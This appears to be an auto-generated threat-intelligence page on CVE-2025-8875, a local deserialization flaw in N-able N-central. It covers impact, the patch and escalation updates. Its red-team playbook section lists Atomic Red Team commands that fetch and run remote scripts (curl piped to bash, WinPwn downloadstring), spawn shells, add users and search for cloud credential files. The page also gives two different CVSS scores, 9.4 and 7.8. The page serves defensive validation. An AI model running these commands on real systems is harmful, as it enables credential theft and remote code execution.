CVE-2025-8875
Overview
This vulnerability is a deserialization of untrusted data flaw within N-able N-central's local processing component. The root cause lies in the improper handling and deserialization of user-supplied input, which is not validated or sanitized before being deserialized. This flaw affects the internal data deserialization routines responsible for processing local inputs prior to execution.
Vulnerability Description
Deserialization of Untrusted Data vulnerability in N-able N-central allows Local Execution of Code.This issue affects N-central: before 2025.3.1.
Impact
An attacker with low-privileged local access can exploit this vulnerability to execute arbitrary code with elevated privileges within the N-central environment. This can lead to full system compromise, unauthorized access to sensitive data, and potential lateral movement within the network. No user interaction is required beyond local access, increasing the risk of insider threats or compromised local accounts leading to critical system control.
Solution
N-able has addressed this issue in N-central version 2025.3.1. Users should upgrade to this version or later to remediate the vulnerability. Detailed patch instructions and release notes are available at https://status.n-able.com/2025/08/13/announcing-the-ga-of-n-central-2025-3-1/. No additional workarounds are documented by the vendor.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with deserialization of untrusted data in N-able N-central presents a significant risk to systems utilizing this software. Deserialization is the process of converting a data stream back into an object, and when this process is not properly secured, it can allow an attacker to manipulate the data being deserialized. In this case, the flaw allows for local execution of arbitrary code, which can lead to unauthorized access and control over the affected system. This vulnerability arises from inadequate validation of input data, enabling attackers to craft malicious payloads that, when deserialized, execute unintended commands within the application’s context.
Attack vectors for exploiting this vulnerability are particularly concerning due to the potential for local execution of code. An attacker with local access to the system could leverage this flaw to execute arbitrary commands, potentially leading to a complete compromise of the affected environment. Scenarios may include an insider threat where a malicious user with legitimate access exploits the vulnerability to escalate privileges, or an external attacker who gains local access through other means, such as physical access or social engineering tactics. The ability to execute arbitrary code opens the door to a variety of malicious activities, including data exfiltration, installation of backdoors, or even lateral movement within the network to compromise additional systems.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on N-able N-central for managing their IT infrastructure. The high CVSS score of 9.4 indicates a critical level of risk, suggesting that successful exploitation could lead to significant operational disruptions and financial losses. Businesses may face not only the immediate consequences of a breach, such as data loss and system downtime, but also long-term repercussions including reputational damage, regulatory fines, and loss of customer trust. Furthermore, the potential for attackers to leverage this vulnerability to pivot to other systems within the network amplifies the overall risk, making it imperative for organizations to address this issue promptly.
Detection and mitigation strategies are crucial in managing the risks associated with this vulnerability. Organizations should first ensure that they are running the latest version of N-able N-central, as updates may include patches that resolve this issue. Regular vulnerability assessments and penetration testing can help identify any instances of this vulnerability within the environment. Additionally, implementing strict access controls and monitoring for unusual activity can help detect potential exploitation attempts. Employing application security best practices, such as input validation and output encoding, can also reduce the risk of deserialization attacks. Training staff on security awareness and the importance of safeguarding sensitive data can further bolster defenses against exploitation.
In conclusion, the deserialization of untrusted data vulnerability in N-able N-central poses a significant threat to organizations utilizing this software. The potential for local execution of arbitrary code can lead to severe consequences, including unauthorized access and control over critical systems. By understanding the technical details, attack vectors, and real-world impacts of this vulnerability, organizations can better prepare themselves to detect and mitigate the associated risks. Proactive measures, including timely updates, regular security assessments, and robust access controls, are essential in safeguarding against this and similar vulnerabilities in the future.
Recent developments indicate a marked escalation in the threat landscape surrounding CVE-2025-8875. CSURFACE threat intelligence has identified the emergence of a public proof-of-concept exploit hosted on GitHub, significantly lowering the barrier for adversaries to weaponize this vulnerability. Concurrently, the vulnerability’s inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog formalizes its recognition as a critical risk, mandating prioritized attention from defenders and asset owners. Our telemetry reflects a corresponding increase in exploit-related activity, consistent with the vulnerability’s updated CVSS score of 7.8 and a rising EPSS score, signaling a growing likelihood of exploitation attempts in operational environments. While ransomware usage linked to this vulnerability remains undetermined, the availability of exploit code and official KEV listing elevate the overall threat level from theoretical to imminent, underscoring an urgent need for heightened vigilance in detection and response efforts.
Update 2 — July 16, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2025-8875, accompanied by a slight uptick in the EPSS score. This trend reflects increased adversary interest and potential probing attempts targeting vulnerable N-able N-central deployments prior to version 2025.3.1. The emergence of publicly available proof-of-concept exploits further lowers the barrier for exploitation, intensifying the operational risk. While ransomware involvement remains unconfirmed, the vulnerability’s inclusion in the KEV catalog and rising telemetry signals a transition from theoretical risk to active threat. Defenders should interpret this as an indication that exploitation attempts are becoming more frequent and sophisticated, warranting elevated monitoring and response readiness. Overall, the threat level has shifted upward, emphasizing the urgency for asset owners to maintain heightened situational awareness.
Update 3 — July 23, 2026
CSURFACE threat intelligence has identified a slight increase in exploitation attempts targeting CVE-2025-8875, reflected by a modest uptick in telemetry signals. This trend, while not yet rapid or widespread, indicates growing adversary interest and experimentation with the vulnerability, particularly as proof-of-concept exploits remain publicly accessible. The vulnerability’s presence in the KEV catalog continues to underscore its operational relevance, even as ransomware involvement remains unconfirmed. For defenders, this emerging activity signals a need to maintain vigilant monitoring as the threat landscape evolves from theoretical risk toward more active probing. Consequently, the overall threat level for CVE-2025-8875 has been adjusted upward to reflect this incremental but meaningful increase in exploitation attempts.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
N-Able | N-Central | All |
cpe:2.3:a:n-able:n-central:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
rxerium/CVE-2025-8875-CVE-2025-8876
Detection for CVE-2025-8875 & CVE-2025-8876
|
rxerium | 21 | 5 | 2025-08-17 | View |
Threat Feed
8 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
55%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-8875 |
| status.n-able.com |
GitHub CVE
|
https://status.n-able.com/2025/08/13/announcing-the-ga-of-n-central-2025-3-1/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-8875 |